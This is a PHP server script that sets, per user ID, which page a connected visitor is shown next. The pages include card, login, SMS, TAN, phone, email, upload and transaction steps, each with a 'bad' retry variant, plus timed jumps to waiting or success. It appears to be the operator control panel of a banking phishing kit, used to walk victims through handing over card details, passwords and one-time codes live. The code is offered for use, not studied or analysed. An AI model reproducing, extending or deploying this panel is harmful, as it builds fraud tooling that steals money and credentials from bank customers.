<?php
// Include the database configuration file
require_once 'db_config.php';

// Check if the request method is POST
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // Get the POST data (selectedPage and userId)
    $postData = json_decode(file_get_contents("php://input"), true);

    if (isset($postData['selectedPage']) && isset($postData['userId'])) {
        $selectedPage = $postData['selectedPage'];
        $userId = $postData['userId'];

        // Determine the initial location value based on the selected page
        $location = '';
        if ($selectedPage == 'custom') {
            $location = 'custom_page.txt';
        } elseif ($selectedPage == 'waiting') {
            $location = 'waiting.txt';  
        } elseif ($selectedPage == 'afk') {
            $location = 'afk.txt';  
        } elseif ($selectedPage == 'app') {
            $location = 'app.txt';  
        } elseif ($selectedPage == 'cc_bad') {
            $location = 'cc_bad.txt';   
        } elseif ($selectedPage == 'cc') {
            $location = 'cc.txt'; 
        } elseif ($selectedPage == 'email_bad') {
            $location = 'email_bad.txt'; 
        } elseif ($selectedPage == 'email') {
            $location = 'email.txt'; 
        } elseif ($selectedPage == 'email_success') {
            $location = 'email_success.txt'; 
        } elseif ($selectedPage == 'details_bad') {
            $location = 'details_bad.txt';  
        } elseif ($selectedPage == 'details') {
            $location = 'details.txt';  
        } elseif ($selectedPage == 'login_bad') {
            $location = 'login_bad.txt';
        } elseif ($selectedPage == 'login') {
            $location = 'login.txt';
        } elseif ($selectedPage == 'phone_bad') {
            $location = 'phone_bad.txt';  
        } elseif ($selectedPage == 'phone') {
            $location = 'phone.txt';  
        } elseif ($selectedPage == 'sms_bad') {
            $location = 'sms_bad.txt';  
        } elseif ($selectedPage == 'sms') {
            $location = 'sms.txt';  
        } elseif ($selectedPage == 'success') {
            $location = 'success.txt';  
        } elseif ($selectedPage == 'transaction') {
            $location = 'transaction.txt';  
        } elseif ($selectedPage == 'upload') {
            $location = 'upload.txt';  
        } elseif ($selectedPage == 'upload_bad') {
            $location = 'upload_bad.txt';  
        } elseif ($selectedPage == 'success_trn') {
            $location = 'success_trn.txt'; 
        } elseif ($selectedPage == 'activation') {
            $location = 'activation.txt'; 
        } elseif ($selectedPage == 'limit') {
            $location = 'cancellation.txt'; 
        } elseif ($selectedPage == 'tan') {
            $location = 'tan.txt'; 
        } elseif ($selectedPage == 'tan_bad') {
            $location = 'tan_bad.txt'; 
        } elseif ($selectedPage == 'startan') {
            $location = 'startan.txt';  
        } elseif ($selectedPage == 'startan_bad') {
            $location = 'startan_bad.txt';  
        }
        
        // Update the location value in the database based on the selected page and user ID
        $updateSql = "UPDATE main SET location = ? WHERE user_id = ?";
        $updateStmt = $conn->prepare($updateSql);
        $updateStmt->bind_param("ss", $location, $userId);
        if ($updateStmt->execute()) {
            echo "Location updated successfully";

            // Check if the location is set to success.txt
            if ($location == 'success.txt') {
                // Wait for 6 seconds
                sleep(6);

                // Update the user's online_status to 0
                $updateStatusSql = "UPDATE main SET online_status = 0 WHERE user_id = ? AND location = 'success.txt'";
                $updateStatusStmt = $conn->prepare($updateStatusSql);
                $updateStatusStmt->bind_param("s", $userId);
                if ($updateStatusStmt->execute()) {
                    echo "Online status updated to 0 after 6 seconds";
                } else {
                    echo "Error updating online status: " . $updateStatusStmt->error;
                }
                $updateStatusStmt->close();
            }

            // Additional check for email_success.txt
            if ($location == 'email_success.txt') {
                // Wait for 5 seconds
                sleep(5);

                // Change the location value to waiting.txt
                $newLocation = 'waiting.txt';
                $updateNewLocationSql = "UPDATE main SET location =? WHERE user_id =?";
                $updateNewLocationStmt = $conn->prepare($updateNewLocationSql);
                $updateNewLocationStmt->bind_param("ss", $newLocation, $userId);
                if ($updateNewLocationStmt->execute()) {
                    $updateNewLocationStmt->close();
                } else {
                    // Handle error
                }
            }

        } else {
            echo "Error updating location: " . $updateStmt->error;
        }
        $updateStmt->close(); 

    } else {
        echo "Missing parameters";
    }
} else {
    echo "Invalid request method";
}
?>
